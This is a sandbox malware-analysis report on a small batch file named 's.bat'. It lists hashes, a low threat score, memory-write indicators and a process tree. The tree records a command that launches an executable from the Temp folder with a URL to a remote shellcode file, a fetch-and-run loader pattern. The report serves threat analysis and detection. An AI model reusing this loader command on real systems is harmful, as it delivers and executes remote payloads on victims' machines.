89deb42ce8627126769e072cfeee490ec71cb980e311bec2664cc58cd33c4b5f | Triage

Resubmissions

04/11/2021, 15:43

211104-s5xyyaghf7 10

04/11/2021, 15:05

211104-sf9w7sghb7 10

Analysis

max time kernel
1s
max time network
40s
platform
windows7_x64
resource
win7-en-20210920
submitted
04/11/2021, 15:43

Sharing

Report Analysis Logs

General

Target

s.bat
Size

88B
MD5

d69a52a259d3ed368cb3133745839e8b
SHA1

601a7608e6fc25fee199eed858f97748a308f2ff
SHA256

db4e4564fece5cd02bc4278237b09fe674e91d0f2b73e7f5cfb3a29471f192e7
SHA512

5159241ad07b297e500b83d9874eb001fe149d6819e123d1d32b3364a9f55830539abd98a8256b747054f238c1869560144521a1d6b05970a1e38f63527a9715

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1212 wrote to memory of 1504	1212	cmd.exe	29
PID 1212 wrote to memory of 1504	1212	cmd.exe	29
PID 1212 wrote to memory of 1504	1212	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\s.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Users\Admin\AppData\Local\Temp\dwm-x64.exe
  C:\Users\Admin\AppData\Local\Temp\dwm-x64.exe https://hatching.dev/n0t/host64_sh.bin -nm
  2⤵
  PID:1504

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads